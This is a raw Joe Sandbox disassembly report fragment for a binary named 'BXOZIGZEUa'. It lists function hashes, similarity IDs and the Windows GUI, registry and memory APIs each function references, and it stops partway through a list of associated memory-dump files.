                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3$ClassCursorException@8InfoLoadThrow
                                                                  • String ID: %s:%x:%x:%x:%x
                                                                  • API String ID: 3308755097-1000192757
                                                                  • Opcode ID: 821b9a22c688ec4facd6adce86295cbe8d4b133aeb7d7a7767bfd0a7a613c034
                                                                  • Instruction ID: 89d11ccf2a8f83c2a88829639d29dd7775164ec5328ce98510b794bc53e147cf
                                                                  • Opcode Fuzzy Hash: 821b9a22c688ec4facd6adce86295cbe8d4b133aeb7d7a7767bfd0a7a613c034
                                                                  • Instruction Fuzzy Hash: E82129B0D01219AFCB00EFA5D885BDEBBB4BF28700F50842EF844A7251DB749A41CF65
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 0022AB4E
                                                                    • Part of subcall function 0023B240: __EH_prolog3.LIBCMT ref: 0023B247
                                                                    • Part of subcall function 0023B240: SetRectEmpty.USER32(?), ref: 0023B32D
                                                                    • Part of subcall function 0023B240: SetRectEmpty.USER32(?), ref: 0023B356
                                                                  • SetRectEmpty.USER32(?), ref: 0022AC55
                                                                  • SetRectEmpty.USER32(?), ref: 0022AC5E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: EmptyRect$H_prolog3
                                                                  • String ID: (;/
                                                                  • API String ID: 3752103406-1585191979
                                                                  • Opcode ID: 988acb56f66e302b833e76b4e78e92baad26b5d462b6839de4a1b784f6e5b22a
                                                                  • Instruction ID: 15b92b5dffab616b8a5e2fe34574ef2293775d2d736edb76467948e85599f972
                                                                  • Opcode Fuzzy Hash: 988acb56f66e302b833e76b4e78e92baad26b5d462b6839de4a1b784f6e5b22a
                                                                  • Instruction Fuzzy Hash: 783119B0952B068BC362DF6AC5C86CAFBE8BF08300F914A2ED1AE97211C7706654CF45
                                                                  APIs
                                                                  • FillRect.USER32(?,?), ref: 001F2E15
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 001F2E4C
                                                                  • DrawEdge.USER32(?,?,00000000,0000000F), ref: 001F2E6C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$DrawEdgeFillInflate
                                                                  • String ID: iii
                                                                  • API String ID: 785442924-940974255
                                                                  • Opcode ID: 5325b7825ee6badaf12f9513e57b47cf7361ef81c309a7b609e9f1652bebbc54
                                                                  • Instruction ID: 16f8fd9f3d9bf215554f4e27a19600681acaac89c39601313fbe6535f7e085c9
                                                                  • Opcode Fuzzy Hash: 5325b7825ee6badaf12f9513e57b47cf7361ef81c309a7b609e9f1652bebbc54
                                                                  • Instruction Fuzzy Hash: 10110A71500209AFCF01DFA4DD859EF77BDFB49324F104526B916EA191DB30DA05CB60
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Parent$Window
                                                                  • String ID: 02
                                                                  • API String ID: 2655711241-3198232237
                                                                  • Opcode ID: fa20932132dac049678b3a2da8705fc3462b2ac44ae3cf0cb5d3c5add845387c
                                                                  • Instruction ID: 53f5343216be8bf05292259c0a50ea5d7eb530f0bbb3254313b5065c84b13ecd
                                                                  • Opcode Fuzzy Hash: fa20932132dac049678b3a2da8705fc3462b2ac44ae3cf0cb5d3c5add845387c
                                                                  • Instruction Fuzzy Hash: 7701D276114755AFEB243B66AC86F6FB39CFF65760B15002AF90497212EF70FC008A61
                                                                  APIs
                                                                    • Part of subcall function 001D61F6: EnterCriticalSection.KERNEL32(00333728,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D6230
                                                                    • Part of subcall function 001D61F6: InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D6242
                                                                    • Part of subcall function 001D61F6: LeaveCriticalSection.KERNEL32(00333728,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D624F
                                                                    • Part of subcall function 001D61F6: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D625F
                                                                  • CreateBitmap.GDI32(00000008,00000008,00000001,00000001,0020358B), ref: 0020336D
                                                                  • CreatePatternBrush.GDI32(00000000), ref: 0020337A
                                                                  • DeleteObject.GDI32(00000000), ref: 00203386
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$CreateEnter$BitmapBrushDeleteInitializeLeaveObjectPattern
                                                                  • String ID: h f3
                                                                  • API String ID: 3767330792-1810688807
                                                                  • Opcode ID: 442bc8b1c5143e5e182094af725ffa621844bbcb521d8380c1d23928c5ddc2b4
                                                                  • Instruction ID: 76cc567004f1d368798087f1e74778da75fcbd74c8681f5a9d9f60cebe5bf142
                                                                  • Opcode Fuzzy Hash: 442bc8b1c5143e5e182094af725ffa621844bbcb521d8380c1d23928c5ddc2b4
                                                                  • Instruction Fuzzy Hash: F7012631590704BFDB01EFB8ED877AA3AA8AB58B40F004169F506EB1D2CF6489148B61
                                                                  APIs
                                                                    • Part of subcall function 001D61F6: EnterCriticalSection.KERNEL32(00333728,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D6230
                                                                    • Part of subcall function 001D61F6: InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D6242
                                                                    • Part of subcall function 001D61F6: LeaveCriticalSection.KERNEL32(00333728,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D624F
                                                                    • Part of subcall function 001D61F6: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,001D124C,00000010,00000008,001CF8A5,001CF83C,001CAD1B,001CA2E2,?,?,001C106C,00000000), ref: 001D625F
                                                                    • Part of subcall function 001D1231: __EH_prolog3_catch.LIBCMT ref: 001D1238
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  • GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 001DACF9
                                                                  • FreeLibrary.KERNEL32(?), ref: 001DAD09
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                  • String ID: HtmlHelpW$hhctrl.ocx
                                                                  • API String ID: 2853499158-3773518134
                                                                  • Opcode ID: c71e2d16ddf2e5baebb555b1443553c18fa8de5eb7eb5508ea899dd0011391ab
                                                                  • Instruction ID: 7145d2cf4496c26281c9b199cbf76a6a0b71017902946bd4d87e6d298793af46
                                                                  • Opcode Fuzzy Hash: c71e2d16ddf2e5baebb555b1443553c18fa8de5eb7eb5508ea899dd0011391ab
                                                                  • Instruction Fuzzy Hash: E4014432180B06BFCB21AFA1CC0AF4A3B96EF20762F40841BF91A95651EF70D850D692
                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 001D0F2A
                                                                  • GetClassNameW.USER32(?,?,0000000A), ref: 001D0F3F
                                                                  • CompareStringW.KERNEL32(00000409,00000001,?,000000FF,combobox,000000FF), ref: 001D0F59
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ClassCompareLongNameStringWindow
                                                                  • String ID: combobox
                                                                  • API String ID: 1414938635-2240613097
                                                                  • Opcode ID: ccfa05e7fd0680b150d6b547dab905395475bd5fc75e7e4b1a467d42d2eae333
                                                                  • Instruction ID: cb735ad81e5f111932e0c4f2e2983e7681e7318754f915682855abd6cf262af2
                                                                  • Opcode Fuzzy Hash: ccfa05e7fd0680b150d6b547dab905395475bd5fc75e7e4b1a467d42d2eae333
                                                                  • Instruction Fuzzy Hash: A5F0C832654218BFCB11EF78DC86EBE77A8DB0A720F600715F562EB1C0DB20A9018795
                                                                  APIs
                                                                  • KillTimer.USER32(?,00000002), ref: 0021F49F
                                                                  • GetFocus.USER32 ref: 0021F4AB
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000105,00000000), ref: 0021F4DC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: FocusKillRedrawTimerWindow
                                                                  • String ID: y
                                                                  • API String ID: 1950525498-4225443349
                                                                  • Opcode ID: 906243ff3ce5ce6ddce8f78cd2cf1c347b8bf8e375d7cdb59efbc714323bbe9e
                                                                  • Instruction ID: 4d711d00ba0bd1ef51c1b541cd542e68a0661c7323a3b00cecfadcb3f7c11301
                                                                  • Opcode Fuzzy Hash: 906243ff3ce5ce6ddce8f78cd2cf1c347b8bf8e375d7cdb59efbc714323bbe9e
                                                                  • Instruction Fuzzy Hash: 9EF0A931670205EFDB705F51DE09BAB77E5B774711F208439E66A49051D6B58890DF80
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 001D184F
                                                                  • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 001D185F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                                  • API String ID: 1646373207-2994018265
                                                                  • Opcode ID: 50d3132a9a74e4861b2d53b42adbc2d1e6c6502dca10c08de7ebec8541dcc9e8
                                                                  • Instruction ID: d78f80ca28aa536f88a980cc72e3b4f0553e3482f3e66cf547fc196f712ebe2d
                                                                  • Opcode Fuzzy Hash: 50d3132a9a74e4861b2d53b42adbc2d1e6c6502dca10c08de7ebec8541dcc9e8
                                                                  • Instruction Fuzzy Hash: 57F03732180249FBCF125F91EC08BEA3BAAFB08751F054466FA5995060C776C870EBA0
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 001D18B6
                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 001D18C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: Advapi32.dll$RegDeleteKeyTransactedW
                                                                  • API String ID: 1646373207-2168864297
                                                                  • Opcode ID: 0d1a46b5c417a7aeca01811e805ea8b10324acc87f6585d1b42e50de0d3f7064
                                                                  • Instruction ID: 5643ff7d1c495099cd2dad9e7cf75cc38dd41bd9025a149a41189c072888a58e
                                                                  • Opcode Fuzzy Hash: 0d1a46b5c417a7aeca01811e805ea8b10324acc87f6585d1b42e50de0d3f7064
                                                                  • Instruction Fuzzy Hash: E8F0A732240280BB87315B9BEC0CC67BB6AEBC1B61355453BF199C5110D7324855F760
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 001D17F6
                                                                  • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 001D1806
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                  • API String ID: 1646373207-3913318428
                                                                  • Opcode ID: e82119bb0cdb3b6c95881746aa4df6944437d9467a32ec213a538ca50743d5eb
                                                                  • Instruction ID: af1d5b03671dce0e2a6ff0e783b275e6302138ed1db03e528c3661ff4fa43b05
                                                                  • Opcode Fuzzy Hash: e82119bb0cdb3b6c95881746aa4df6944437d9467a32ec213a538ca50743d5eb
                                                                  • Instruction Fuzzy Hash: 61F08232280246FBCF219F91EC08BE63BA9EF19751F084436F595D51B0DB71D8A0EBA1
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 002049C8
                                                                  • GetProcAddress.KERNEL32(00000000,GetFileAttributesTransactedW), ref: 002049D8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: GetFileAttributesTransactedW$kernel32.dll
                                                                  • API String ID: 1646373207-1378992308
                                                                  • Opcode ID: 112e8a29e18ae38e886e294bd046aef8cc6752b9af165cf6cf0066a90441d1de
                                                                  • Instruction ID: 43c3db07eba9e0efe8ba093bd5185f661253178a42f495e24357cbcdcdd5cdd4
                                                                  • Opcode Fuzzy Hash: 112e8a29e18ae38e886e294bd046aef8cc6752b9af165cf6cf0066a90441d1de
                                                                  • Instruction Fuzzy Hash: 2CF0A0722A034AEBCF212FA5AC08B967798EB04751F04863BF648950A0DE71C8B0DA90
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 002186B4
                                                                  • GetWindowRect.USER32(?,?), ref: 002188AC
                                                                  • GetParent.USER32(?), ref: 00218930
                                                                  • GetParent.USER32(?), ref: 00218C24
                                                                    • Part of subcall function 0021DF57: GetParent.USER32(?), ref: 0021DF88
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Parent$H_prolog3_RectWindow
                                                                  • String ID:
                                                                  • API String ID: 3969657074-0
                                                                  • Opcode ID: 6b18402a8d0c43640823bf98e0f181440257aca9b8d5a832b9a0e606060f7202
                                                                  • Instruction ID: 621382c1a2fea6930ebed8f6b825eab8b29c03675e5aca0323a65e84cb97ba44
                                                                  • Opcode Fuzzy Hash: 6b18402a8d0c43640823bf98e0f181440257aca9b8d5a832b9a0e606060f7202
                                                                  • Instruction Fuzzy Hash: D7124770A11209AFCF15EFA4C899AEDB7F6BF68310F14012AF456E7291DF309A41CB51
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00203DC2
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  • _memset.LIBCMT ref: 00203E56
                                                                  • _memset.LIBCMT ref: 00203EEF
                                                                  • _memset.LIBCMT ref: 0020401D
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$H_prolog3$Exception@8Throw
                                                                  • String ID:
                                                                  • API String ID: 3059216242-0
                                                                  • Opcode ID: 9b83bd3984c95bacd0f5174bed7e6376c6321be83862b0799b42cf26d0642d90
                                                                  • Instruction ID: b1417abc875f4bc9a90a0ef1d62bbf2bc9e611044fbba35c4aa4075402dd2fdc
                                                                  • Opcode Fuzzy Hash: 9b83bd3984c95bacd0f5174bed7e6376c6321be83862b0799b42cf26d0642d90
                                                                  • Instruction Fuzzy Hash: 50A1047191070A9FCB18DF24C9857AEBBBAEF60314F20C51DE52A9B6D2D770EA50CB50
                                                                  APIs
                                                                  • SetRectEmpty.USER32(?), ref: 00219F75
                                                                  • GetKeyState.USER32(00000011), ref: 00219F7D
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  • GetWindowRect.USER32(?,?), ref: 0021A12D
                                                                  • GetWindowRect.USER32(?,?), ref: 0021A17D
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
